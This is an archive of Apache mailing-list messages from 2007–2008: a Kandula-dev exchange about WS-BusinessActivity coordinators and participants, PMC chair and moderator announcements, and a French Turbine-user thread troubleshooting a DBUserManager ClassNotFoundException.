b24gaXMgYWJvdXQgdGhlIGNvbmNlcHQgb2Ygc3BlY2lmaWNhdGlvbi5CdXQgQ2FuCnlvdSBleHBs YWluIGZvciBtZT9UaGFuayB5b3UgdmVyeSBtdWNoLlRoYW5rIHlvdSAhIQotLSAKICAgICAgICAg ICAgICAgyMTW8c6wCrGxvqnTyrXntPPRpyBQQ04mQ0FE1tDQxAo= ------=_Part_23045_183462.1187540164297 Content-Type: text/html; charset=GB2312 Content-Transfer-Encoding: base64 Content-Disposition: inline PGRpdj5IaTo8L2Rpdj4KPGRpdj4mbmJzcDsmbmJzcDsmbmJzcDsgSSBoYXZhIHJlYWQga2FuZHVs YSBjb2RlIGFuZCBsZWFybnQgaXQgbWFueSBkYXlzLk5vdyBJIHN0aWxsIGhhdmUgc29tZSBxdWVz aW9uIGFib3V0IGl0IC48L2Rpdj4KPGRpdj4mbmJzcDsmbmJzcDsmbmJzcDsgMS4gSWYgdGhlIGNv b3JkaW5hdGlvbiBwcm90b2NvbCB0eXBlIGlzICZxdW90O1BDJnF1b3Q7LlRoZW4sSG93IGNhbiBJ IGNvbnRyb2wgdGhlIHBhcnRpY2lwYW50IHRvIGRvIHNvbWUgb3JkZXJzPyhlLmcuIHNlbmQgY29t cGxldGVkIG1lc3NhZ2UpLkRvIEkgbXVzdCB3cml0ZSB0aGUgJnF1b3Q7cGFydGljaXBhbnQudGVs bGNvbXBsZXRlZCAmcXVvdDsgY29kZSBpbiBjbGFzcyB3aGljaCBpbXBsZW1lbnRzIEJBd1BDUGFy dGljaXBhbnQoIAplLmcuUmVudEFDYXJQYXJ0aWNpcGFudCk/SXMgdGhlcmUgYW55IG90aGVyIG1l dGhvZC5CZWNhdXNlIEkgd2FudCB0byB1c2UgdGhlIGJ1dHRvbiBvbiB0aGUgd2ViIHRyaWdnZXIg dGhlIHNlbmRpbmcgb2YgbWVzc2FnZSAmcXVvdDtjb21wbGV0ZWQmcXVvdDsuT3IsIGlzIHRoZXJl IHNvbWV0aGluZyBsaWtlICZxdW90O3Byb3h5JnF1b3Q7IEFQSSB3aGljaCBjYW4gaGVscCBtZSBj b250cm9sIHBhcnRpY2lwYW50JiMzOTtzIG9yZGVyLiAKPC9kaXY+CjxkaXY+Jm5ic3A7Jm5ic3A7 IDIuIEkgd2FudCBhc2sgc29tZXRoaW5nIGFib3V0IHlvdXIgaW1wbGVtZW50IG9mIEJBLkkgdGhp bmsgQkEgY2FuIGhlbHAgc292bGUgTG9uZ1RpbWUgQnVzc2luZXNzIGFjdGl2aXR5LlRoZW4gd2hl cmUmbmJzcDtjYW4gSSBzZWUgdGhlJm5ic3A7ZnVuY3Rpb24gb2YmbmJzcDsmbmJzcDtrYW5kdWxh IHNvbHZpbmcgdGhlIExvbmdUaW1lIHF1c3Rpb24uRm9yIGV4YW1wbGUuRm9yIGV4YW1wbGUsUGFy dGljaXBhbnQgUDEgd2lsbCBydW4gMTAgZGF5cyBpbiBvcmRlciB0byBnZXQgdGhlIApyZXN1bHQu V2hlbiBQMSBnZXQgdGhlIHJlc3VsdCAsaXQgd2lsbCBub3RpZnkgUGFydGljaXBhbnQgUDIgdG8g ZGUgb3RoZXIgdGFzay5EbyB0aGUgQ29vcmRpbmF0b3IgY2FuIGltcGxlbWVudCB0aGUgZnVuY3Rp b24tLWFmdGVyIFAxIGZpbmlzaCB0aGUgam9iLG5vZml0eSBQMiB0byBkbyBqb2I/PC9kaXY+Cjxk aXY+Jm5ic3A7Jm5ic3A7IDMuSSBhbHdheXMgY29uZnVzZSB0aGUgY29vcmRpbmF0b3IuQ2FuIHlv dSB0ZWxsIG1lIHdoYXQgZG8gdGhlIGNvb3JkaW5hdG9yIGNvb3RkaW5hdGU/SWYgSSBkb24mIzM5 O3QgdXNpbmcgY29vcmRpbmF0b3Igc3BlY2lmaWNhdGlvbi5KdXN0IGxldCB0aGUgYXBwbGljaXRp b24gdGhlIHN0YXRlLldoYXQgaXMgdGhlIGRpZmZlcmVuY2UgZGlzdGluZ3Vpc2ggdXNpbmcga2Fu ZHVsYSBpbXBsZW1lbnQgbXkgYXBwbGljYXRpb24uIAo8L2Rpdj4KPGRpdj4mbmJzcDs8L2Rpdj4K PGRpdj4mbmJzcDsgSSBrbm93IG1heWJlIHNvbWUgcXVlc3Rpb24gaXMgYWJvdXQgdGhlIGNvbmNl cHQgb2Ygc3BlY2lmaWNhdGlvbi5CdXQgQ2FuIHlvdSBleHBsYWluIGZvciBtZT9UaGFuayB5b3Ug dmVyeSBtdWNoLlRoYW5rIHlvdSAhITxicj4tLSA8YnI+Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7 Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i c3A7IMjE1vHOsDxicj6xsb6p08q157Tz0acgUENOJmFtcDtDQUTW0NDEIDwvZGl2Pgo= ------=_Part_23045_183462.1187540164297-- From [email protected] Mon Aug 20 14:22:09 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 28641 invoked from network); 20 Aug 2007 14:22:08 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Aug 2007 14:22:08 -0000 Received: (qmail 87849 invoked by uid 500); 20 Aug 2007 14:21:50 -0000 Delivered-To: [email protected] Received: (qmail 87810 invoked by uid 500); 20 Aug 2007 14:21:49 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <kandula-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 87781 invoked by uid 99); 20 Aug 2007 14:21:49 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Aug 2007 07:21:49 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO rv-out-0910.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Aug 2007 14:21:44 +0000 Received: by rv-out-0910.google.com with SMTP id c24so858038rvf for <[email protected]>; Mon, 20 Aug 2007 07:21:24 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=Xhs6Ipr8dByat7hFChow9qjPLT+teJmacha5DzcueQxK5310I4SYDWjZxnIAnO7A8vp01wEti807c9YGukkbUWlyqKBz8g7aNox2ZamQ/Vp4Wd66fOj2dFnnNhEop/B0Z2NkzJHDGWwnYlSCa+CLl7vaC+4VYTuzTedSHa2k3nw= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=uVVwGMUyG6NbsyZUvxrzfcKt/ahdwaYKlyfLbWo6J7Rz8Mt5h05ZR47T1RlOH6TxfU7P7MYvy650L3sGJXxO3nhGhaznbdG5OLUByulmqWUJTRqrGNNhisxBOHdbNX9Uaso3lE/yZLxd09Uz8El2QymrttDLKZ5wF/e8dt8HReY= Received: by 161.129.204.104 with SMTP id f1mr775840wae.1187619683152; Mon, 20 Aug 2007 07:21:23 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Mon, 20 Aug 2007 07:21:23 -0700 (PDT) Message-ID: <[email protected]> Date: Mon, 20 Aug 2007 10:21:23 -0400 From: "Davanum Srinivas" <[email protected]> Reply-To: [email protected] To: "[email protected]" <[email protected]> Subject: Stepping down as PMC chair MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline X-Virus-Checked: Checked by ClamAV on apache.org Dear WS folks, It's been a wild ride since WS PMC inception in 2003 as the PMC chair. I'd like to step down from this role now. Dear PMC folks, Please start the process for nominations for a new PMC chair followed by a VOTE. FYI, There's a board meeting every month (typically the 3rd week). We'd need to draft a resolution and sent it in time for a scheduled board meeting. Thanks! -- dims -- Davanum Srinivas acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b http://davanum.wordpress.com --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Mon Aug 20 14:40:44 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 37797 invoked from network); 20 Aug 2007 14:40:43 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 20 Aug 2007 14:40:43 -0000 Received: (qmail 43703 invoked by uid 500); 20 Aug 2007 14:40:39 -0000 Delivered-To: [email protected] Received: (qmail 43640 invoked by uid 500); 20 Aug 2007 14:40:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <kandula-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 43629 invoked by uid 99); 20 Aug 2007 14:40:39 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Aug 2007 07:40:39 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO wa-out-1112.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 20 Aug 2007 14:41:09 +0000 Received: by wa-out-1112.google.com with SMTP id k22so855570waf for <[email protected]>; Mon, 20 Aug 2007 07:40:16 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=rilDKXxTNZZxJ75h7qg/iy8BS6Q8rJEZOxphpg00GvTSolx/jLuu1lm9gf4kPjv3q9M5GlAb1Gj0Sae24hvQQxEpe6CpR03PzjF4tBdc8zPseDMc09aAn8LowKItfqj3A+nSYvOjVCEi2tm47wxudmsC6oFk0SpnpTN+J1dR9pk= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=Uuk2leCAl1JM/LTZguYiNZwEJ5uz317z0MmVgjCc2Ot0q4oNV8p3UP+9UgW8NCKvfunjx0wzFOzshBV2bTkGgW90EJA9qnr/1wSban2nklP7+ZdjE1/Ip1kPXozAM2vRdO5QpPFdxH58jUBZKLBUJNXcygE2CU244ezPDRFrHos= Received: by 161.129.204.104 with SMTP id w2mr1181140wae.1187620816404; Mon, 20 Aug 2007 07:40:16 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Mon, 20 Aug 2007 07:40:16 -0700 (PDT) Message-ID: <[email protected]> Date: Mon, 20 Aug 2007 10:40:16 -0400 From: "Davanum Srinivas" <[email protected]> Reply-To: [email protected] To: "[email protected]" <[email protected]> Subject: Need moderators for Mailing lists MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline X-Virus-Checked: Checked by ClamAV on apache.org Folks, [Sorry for the massive cross-post!!!] Anyone who is willing to be moderator for any of the following mailing lists at ws, please drop me an note. axis-c-dev axis-c-user axis-cvs axis-dev axis-tck axis-user-ja axis-user commons-dev general juddi-cvs juddi-dev juddi-user kandula-dev muse-commits muse-dev muse-user sandesha-dev scout-dev synapse-dev synapse-user woden-dev wsif-dev wsif-user wss4j-dev rampart-dev thanks, dims --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Tue Aug 21 16:13:55 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 75420 invoked from network); 21 Aug 2007 16:13:22 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 21 Aug 2007 16:13:20 -0000 Received: (qmail 90745 invoked by uid 500); 21 Aug 2007 16:13:02 -0000 Delivered-To: [email protected] Received: (qmail 90694 invoked by uid 500); 21 Aug 2007 16:13:02 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <kandula-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 90483 invoked by uid 99); 21 Aug 2007 16:13:01 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 21 Aug 2007 09:13:01 -0700 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO py-out-1112.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Tue, 21 Aug 2007 16:13:27 +0000 Received: by py-out-1112.google.com with SMTP id a25so2668989pyi for <[email protected]>; Tue, 21 Aug 2007 09:12:31 -0700 (PDT) DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=QEnqjkRMpSRZ1/Pb169HKAdta6vaf8xS6Avr1stJvFWsJEKyzN7XBBNLVUzdLTa9oEhqkfE0ZTP/yFKcAWPPROvnYBJ1pz6vh3fyuHXsodwrw37YBLggyfk3Uo7GuhWsuUk4kshZpHYk4EaKN51X68UiqaKzYJoL4Cx8Ci6Mqpw= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:reply-to:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=CLAv03a0PyhPde6JEXLa6N/dbZ06CDA5vGhKYJEbgetzf4bR52qUVGZAwo8lzVXLBSsM3mGqEZoE9EnqL7fNczN754vnPV0goAvoQSXk/LSWrOtT28WV7TvZBZLjChDrBKXLEwZZz6DOsQuL6RAutLBmSoF/tD4K4/ZRbPtcGrY= Received: by 161.129.204.104 with SMTP id o1mr705314wak.1187712750470; Tue, 21 Aug 2007 09:12:30 -0700 (PDT) Received: by 161.129.204.104 with HTTP; Tue, 21 Aug 2007 09:12:30 -0700 (PDT) Message-ID: <[email protected]> Date: Tue, 21 Aug 2007 12:12:30 -0400 From: "Davanum Srinivas" <[email protected]> Reply-To: [email protected] To: "[email protected]" <[email protected]> Subject: Need moderators for Mailing lists - Round #2 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline X-Virus-Checked: Checked by ClamAV on apache.org Team, Here's the current list of moderators. Please check your email id and the lists that you are responsible for. We use [email protected]. Here's a pointer to a FAQ: http://www.apache.org/dev/committers.html#mail-moderate Any questions regarding mailing lists / moderation can be addressed to [email protected]. Please make sure that the project(s) you work on has adequate # of moderators. thanks, dims ==== announce ==== [email protected] [email protected] [email protected] ==== axis-c-dev ==== [email protected] [email protected] [email protected] ==== axis-c-user ==== [email protected] [email protected] [email protected] ==== axis-cvs ==== [email protected] [email protected] [email protected] ==== axis-dev ==== [email protected] [email protected] [email protected] [email protected] ==== axis-tck ==== [email protected] [email protected] ==== axis-user-ja ==== [email protected] [email protected] [email protected] ==== axis-user ==== [email protected] [email protected] [email protected] ==== commons-dev ==== [email protected] [email protected] [email protected] [email protected] [email protected] ==== general ==== [email protected] [email protected] [email protected] [email protected] [email protected] ==== jaxme-dev ==== [email protected] [email protected] ==== juddi-cvs ==== [email protected] [email protected] ==== juddi-dev ==== [email protected] [email protected] [email protected] [email protected] ==== juddi-user ==== [email protected] [email protected] ==== kandula-dev ==== [email protected] [email protected] ==== muse-commits ==== [email protected] [email protected] ==== muse-dev ==== [email protected] [email protected] ==== muse-user ==== [email protected] [email protected] ==== sandesha-dev ==== [email protected] [email protected] [email protected] ==== scout-dev ==== [email protected] [email protected] ==== synapse-dev ==== [email protected] [email protected] [email protected] ==== synapse-user ==== [email protected] [email protected] [email protected] ==== savan-dev ==== [email protected] ==== tuscany-commits ==== [email protected] [email protected] ==== tuscany-dev ==== [email protected] [email protected] ==== tuscany-user ==== [email protected] [email protected] ==== woden-dev ==== [email protected] [email protected] ==== wsif-dev ==== [email protected] [email protected] [email protected] ==== wsif-user ==== [email protected] [email protected] [email protected] ==== wss4j-dev ==== [email protected] [email protected] ==== xmlrpc-dev ==== [email protected] [email protected] [email protected] ==== xmlrpc-user ==== [email protected] [email protected] [email protected] ==== private ==== [email protected] [email protected] ==== xmlrpc-auto ==== [email protected] [email protected] [email protected] ==== rampart-dev ==== [email protected] [email protected] ==== rampart-c-dev ==== [email protected] [email protected] [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Fri Aug 24 11:18:19 2007 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 86914 invoked from network); 24 Aug 2007 11:18:18 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 24 Aug 2007 11:18:18 -0000 Received: (qmail 69520 invoked by uid 500); 24 Aug 2007 11:18:14 -0000 Delivered-To: [email protected] Received: (qmail 69483 invoked by uid 500); 24 Aug 2007 11:18:14 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <kandula-dev.ws.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 69472 invoked by uid 99); 24 Aug 2007 11:18:14 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Aug 2007 04:18:14 -0700 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mx.inode.at) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 24 Aug 2007 11:18:08 +0000 Received: from [161.129.204.104] (port=13112 helo=margarita.erven.at) by smartmx-20.inode.at with esmtps (TLS-1.0:DHE_RSA_AES_256_CBC_SHA:32) (Exim 4.50) id 1IOXAe-0003ZQ-QO for [email protected]; Fri, 24 Aug 2007 13:17:45 +0200 Received: from [161.129.204.104] (localhost [161.129.204.104]) by margarita.erven.at (Postfix) with ESMTP id 74CB63405D7 for <[email protected]>; Fri, 24 Aug 2007 13:17:39 +0200 (CEST) Message-ID: <[email protected]> Date: Fri, 24 Aug 2007 13:17:44 +0200 From: Hannes Erven <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20070728) MIME-Version: 1.0 To: [email protected] Subject: Re: Question aboot kandula BA References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=GB2312 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org Hi =D6=F1=CE=B0=C8=C4, > 1. If the coordination protocol type is "PC".Then,How can I control= =20 > the participant to do some orders?(e.g. send completed message).Do I=20 > must write the "participant.tellcompleted " code in class which=20 > implements BAwPCParticipant( e.g.RentACarParticipant)? > Is there any other > method.Because I want to use the button on the web trigger the sending=20 > of message "completed".Or, is there something like "proxy" API which ca= n=20 > help me control participant's order. The BAwPCParticipant class is already a proxy. It runs on the "client" (or service) and handles the communication to the coordinator. There is another way to deliver the Completed message: invoke the coordinator service directly and use the Completed operation specified by WS-BA. (This is exactly the same thing the BAwPCParticipant does when you invoke tellCompleted() ). > 2. I want ask something about your implement of BA.I think BA can=20 > help sovle LongTime Bussiness activity.Then where can I see the functio= n=20 > of kandula solving the LongTime qustion.For example.For=20 > example,Participant P1 will run 10 days in order to get the result.When= =20 > P1 get the result ,it will notify Participant P2 to de other task.Do th= e=20 > Coordinator can implement the function--after P1 finish the job,nofity=20 > P2 to do job? Kandula is a transaction manager and handles different transaction types, one of them being long running business transactions defined by WS-BusinessActivity. This is all on the "transaction" layer. What you describe are requirements that are on a different layer. Have a look at Orchestration and Choreography specifications - these do exactly what you describe. > 3.I always confuse the coordinator.Can you tell me what do the=20 > coordinator cootdinate?If I don't using coordinator specification.Just=20 > let the applicition the state.What is the difference distinguish using=20 > kandula implement my application. I'm sorry, I don't quite understand your question. But I guess the following illustration might clear things up: In any WS-Transaction transaction scope there live three roles: - the Initiator, being the one who created the transaction - the Participants, being ressources or services that are called by the initiator - the Coordinator, being the entity that connects the parties. These entities use different protocols to communicate: Coordinator <-> Participants: WS-Coordination + WS-BusinessActivity Initiator <-> Coordinator: WS-Cooordination + WS-BusinessActivity-Iniatit= or -hannes --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected]
From [email protected] Thu Jan 03 11:25:24 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 88188 invoked from network); 3 Jan 2008 11:25:24 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 3 Jan 2008 11:25:24 -0000 Received: (qmail 22045 invoked by uid 500); 3 Jan 2008 11:25:12 -0000 Delivered-To: [email protected] Received: (qmail 22021 invoked by uid 500); 3 Jan 2008 11:25:12 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user.turbine.apache.org> Reply-To: "Turbine Users List" <[email protected]> Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 64664 invoked by uid 99); 3 Jan 2008 08:45:50 -0000 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) X-ME-UUID: [email protected] Message-ID: <[email protected]> Date: Thu, 03 Jan 2008 09:44:35 +0100 From: Karen Lavignasse <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20071031) MIME-Version: 1.0 To: [email protected] Subject: DBUserManager not found Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org Bonjour, j'obtiens une erreur dans mes logs, bien que cela n'entrave absolument le bon fonctionnement de l'application. D'où cela pourrait-il venir ? malgré la configuration suivante (Turbine 2.2, contenant bien les classes aux endroits indiqués ci-dessous) : services.SecurityService.classname=org.apache.turbine.services.security.db.DBSecurityService services.SecurityService.userPeer.class=org.apache.turbine.om.security.peer.TurbineUserPeer services.SecurityService.user.manager=org.apache.turbine.services.security.db.DBUserManager services.SecurityService.secure.passwords=false services.SecurityService.secure.passwords.algorithm=SHA j'obtiens l'erreur suivante dans mes logs : 2008-01-03 09:38:46,315 [main] ERROR system - java.lang.ClassNotFoundException: org.apache.turbine.services.security.DBUserManager at org.apache.catalina.loader.WebappClassLoader.loadClass(WebappClassLoader.java:1332) at org.apache.catalina.loader.WebappClassLoader.loadClass(WebappClassLoader.java:1181) at java.lang.ClassLoader.loadClassInternal(ClassLoader.java:319) at java.lang.Class.forName0(Native Method) at java.lang.Class.forName(Class.java:164) at org.apache.turbine.services.security.BaseSecurityService.init(BaseSecurityService.java:204) rethrown as org.apache.turbine.services.InitializationException: BaseSecurityService.init: Failed to instantiate Use\ rManager: org.apache.turbine.services.security.DBUserManager at org.apache.turbine.services.security.BaseSecurityService.init(BaseSecurityService.java:210) at org.apache.turbine.services.TurbineBaseService.init(TurbineBaseService.java:108) at org.apache.turbine.services.BaseInitableBroker.initClass(BaseInitableBroker.java:149) at org.apache.turbine.services.BaseServiceBroker.doInitService(BaseServiceBroker.java:224) at org.apache.turbine.services.BaseServiceBroker.initServices(BaseServiceBroker.java:193) at org.apache.turbine.Turbine.init(Turbine.java:257) at javax.servlet.GenericServlet.init(GenericServlet.java:211) at org.apache.catalina.core.StandardWrapper.loadServlet(StandardWrapper.java:1091) at org.apache.catalina.core.StandardWrapper.load(StandardWrapper.java:925) at org.apache.catalina.core.StandardContext.loadOnStartup(StandardContext.java:3857) at org.apache.catalina.core.StandardContext.start(StandardContext.java:4118) at org.apache.catalina.core.ContainerBase.addChildInternal(ContainerBase.java:759) at org.apache.catalina.core.ContainerBase.addChild(ContainerBase.java:739) at org.apache.catalina.core.StandardHost.addChild(StandardHost.java:524) at org.apache.catalina.startup.HostConfig.deployDescriptor(HostConfig.java:589) at org.apache.catalina.startup.HostConfig.deployDescriptors(HostConfig.java:536) at org.apache.catalina.startup.HostConfig.deployApps(HostConfig.java:471) at org.apache.catalina.startup.HostConfig.start(HostConfig.java:1102) at org.apache.catalina.startup.HostConfig.lifecycleEvent(HostConfig.java:311) at org.apache.catalina.util.LifecycleSupport.fireLifecycleEvent(LifecycleSupport.java:119) at org.apache.catalina.core.ContainerBase.start(ContainerBase.java:1020) at org.apache.catalina.core.StandardHost.start(StandardHost.java:718) at org.apache.catalina.core.ContainerBase.start(ContainerBase.java:1012) at org.apache.catalina.core.StandardEngine.start(StandardEngine.java:442) at org.apache.catalina.core.StandardService.start(StandardService.java:450) at org.apache.catalina.core.StandardServer.start(StandardServer.java:683) at org.apache.catalina.startup.Catalina.start(Catalina.java:537) at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Jan 03 13:07:10 2008 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 27840 invoked from network); 3 Jan 2008 13:07:10 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 3 Jan 2008 13:07:10 -0000 Received: (qmail 37694 invoked by uid 500); 3 Jan 2008 13:06:59 -0000 Delivered-To: [email protected] Received: (qmail 37421 invoked by uid 500); 3 Jan 2008 13:06:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <user.turbine.apache.org> Reply-To: "Turbine Users List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 37412 invoked by uid 99); 3 Jan 2008 13:06:58 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 03 Jan 2008 05:06:58 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_HELO_PASS,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO mx-out-a.gicm.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 03 Jan 2008 13:06:36 +0000 Received: from sas-b.gicm.net ([161.129.204.104]) by mx-out-a.gicm.net (8.14.2/8.14.2/GICM-20071123) with ESMTP id m03D56Mk027250 for <[email protected]>; Thu, 3 Jan 2008 14:05:06 +0100 Received: from sas-2-b.gicm.net (sas-b.gicm.net [161.129.204.104]) by sas-b.gicm.net (8.13.4/8.13.4/GICM/SAS-B) with ESMTP id m03D6bfG017413 for <[email protected]>; Thu, 3 Jan 2008 14:06:37 +0100 Received: from oexch-01.gicm.platine.org (alt-2-a-vlan30-pip.GICM.NET [161.129.204.104]) by sas-2-b.gicm.net (8.13.4/8.13.4/GICM/HUB-SAS-B) with ESMTP id m03D6bl3017408 for <[email protected]>; Thu, 3 Jan 2008 14:06:37 +0100 X-MimeOLE: Produced By Microsoft Exchange V6.0.6603.0 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Subject: RE : DBUserManager not found Date: Thu, 3 Jan 2008 14:06:36 +0100 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: DBUserManager not found Thread-Index: AchN+1j61AT8uDksQd6PhS+003JtIgADWtUA From: "KERNEUZET FREDERIC" <[email protected]> To: "Turbine Users List" <[email protected]> X-GICM-Archive-out: 20080103140637.25435 X-Virus-Checked: Checked by ClamAV on apache.org Bonjour, D'apr=E8s ce que je vois les chemins de recherche sont l=E9g=E8rement diff= =E9rents : - L'application cherche la classe DBUserManager dans le package org.apache.= turbine.services.security - La configuration pr=E9cise que DBUserManager se trouve dans le package or= g.apache.turbine.services.security.db Apr=E8s, je ne sais pas dire pourquoi le chemin pr=E9cis=E9 dans la conf n'= est pas celui r=E9ellement utilis=E9 :( Cordialement. Fr=E9d=E9ric -----Message d'origine----- De=A0: Karen Lavignasse [mailto:[email protected]]=20 Envoy=E9=A0: jeudi 3 janvier 2008 09:45 =C0=A0: [email protected] Objet=A0: DBUserManager not found Bonjour, j'obtiens une erreur dans mes logs, bien que cela n'entrave absolument=20 le bon fonctionnement de l'application. D'o=F9 cela pourrait-il venir ? malgr=E9 la configuration suivante (Turbine 2.2, contenant bien les=20 classes aux endroits indiqu=E9s ci-dessous) : services.SecurityService.classname=3Dorg.apache.turbine.services.security.d= b.DBSecurityService services.SecurityService.userPeer.class=3Dorg.apache.turbine.om.security.pe= er.TurbineUserPeer 